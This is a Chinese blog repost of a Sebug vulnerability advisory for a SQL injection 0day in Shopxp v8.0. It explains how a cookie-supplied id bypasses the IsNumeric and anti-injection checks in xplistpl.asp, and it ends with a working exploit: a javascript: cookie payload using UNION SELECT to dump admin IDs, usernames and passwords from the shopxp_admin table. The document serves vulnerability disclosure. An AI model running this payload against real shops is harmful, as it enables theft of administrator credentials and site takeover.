Shopxp v8.0 SQL Injection 0day

2010年2月5日星期五 | | |

SSV ID:19043
Published:2010-02-01
Vulnerable:
v8.0
Discription:
系统使用了早期的枫叶防注系统,只过滤了GET,并且可以绕过,这里不谈绕过的问题了,我们看到  xplistpl.asp  9-36行代码:    <table width="100%"  border="0" cellspacing="0" cellpadding="0">      <tr>        <td width="88%"><TABLE cellSpacing=0 cellPadding=0 width=100% align=center border=0>          <TBODY>            <TR>              <td width="1" background="img_shopxp/xiao/bgbg.gif"></td>              <TD class=b vAlign=top align=left><%if IsNumeric(request.QueryString("id"))=False then    response.write("<script>alert(""非法访问!"");location.href=""index.asp"";</script>")    response.end    end if    dim id    id=request.QueryString("id")    if not isinteger(id) then    response.write"<script>alert(""非法访问!"");location.href=""index.asp"";</script>"    end if%>                  <table width="100%" align="center" border="0" cellspacing="0" cellpadding="0" class="table-zuoyou" bordercolor="#CCCCCC">                    <tr>                      <td width="100%" valign="top" bordercolor="#FFFFFF" bgcolor="#FFFFFF" align="center"><table width="100%" border="0" cellspacing="0" cellpadding="4" align="center">                          <%                    set rs=server.createobject("adodb.recordset")                    rs.open "select * from shopxp_product where shopxpptid="&request("id"),conn,1,3                    if rs.recordcount>0 then                    spmx=rs("shopxpptname")                    end if%>                          <tr>                            <td colspan="3" background="img_shopxp/class_bg.jpg" height=50>  <a href=index.asp><%=webname%></a> >> 商品评论:<%=spmx%></td>                          </tr>                        </table>    上面这段代码存在逻辑漏洞哦,其中 IsNumeric(request.QueryString("id"))=False 这句判断获取的id是否为数字,如果false则停止执行,  但这里的id是通过request.QueryString获取的,如果我们不给id赋值会怎么样呢?同学们可以通过下面的代码来验证:    <%    if IsNumeric(request.QueryString("id"))=False then    response.write("<script>alert(""非法访问!"");location.href=""index.asp"";</script>")    response.end    end if    response.write("my5t3ry")    %>    保存为test.asp,然后直接访问test.asp,看是否打印my5t3ry? 如果不用过request.QueryString给id赋值,  而是通过,request.form或者request.cookies给id赋值是可以直接绕过他的判断的,代码不会停止执行,然后进入  sql查询用的是request("id"),学过asp的同学都知道request通吃get,post,cookie的,到这里就成功bypass防注和IsNumeric函数的判断。
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
用Firefox访问目标站,使用Firefox的插件noscript禁用该站javascript  然后清空地址栏,输入:  javascript:alert(document.cookie="id=" + escape("1  union select 1,cstr(adminid)&chr(124)&admin&chr(124)&password,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 from shopxp_admin"));location.href="/xplistpl.asp";  Ps:如果商品评论后面没有显示,多半是字段数步对造成的,
SEBUG Solution:
等待官方补丁
// sebug.net [2010-02-01]
 
 
谢谢光临本站: http://home.benz.la   共享无限..再次申明 : 此代码含危险性,,请勿从事非法活动.
我的QQ空间
Discuz!7.0-7.2后台settings.inc.php中写shell漏洞
SSV ID:19067SEBUG-Appdir:Discuz!Published:2010-02-05Vulnerab...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作!jim9[email protected]